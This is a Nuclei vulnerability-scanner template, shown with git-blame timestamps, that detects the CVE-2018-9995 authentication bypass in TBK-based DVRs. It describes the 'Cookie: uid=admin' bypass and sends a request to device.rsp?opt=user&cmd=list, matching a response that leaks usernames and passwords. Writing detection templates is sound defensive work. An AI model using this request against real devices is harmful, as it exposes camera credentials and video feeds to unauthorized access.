nuclei-templates/cves/2018/CVE-2018-9995.yaml

41 lines
1.4 KiB
YAML
Raw Normal View History

2021-04-07 12:33:31 +00:00
id: CVE-2018-9995
info:
name: DVR Authentication Bypass
author: princechaddha
severity: critical
2021-08-29 06:24:41 +00:00
description: |
2021-08-29 09:14:12 +00:00
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass
authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides
2021-08-29 06:24:41 +00:00
credentials within JSON data in a response.
2021-08-29 06:36:50 +00:00
reference:
2021-08-29 06:24:41 +00:00
- http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html
- http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
- https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/
- https://www.exploit-db.com/exploits/44577/
2021-04-07 12:33:31 +00:00
tags: cve,cve2018,auth-bypass
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-9995
2021-04-07 12:33:31 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/device.rsp?opt=user&cmd=list"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"uid\":"
2021-06-23 21:02:23 +00:00
- "\"pwd\":"
- "\"view\":"
2021-04-07 12:33:31 +00:00
- "playback"
condition: and
part: body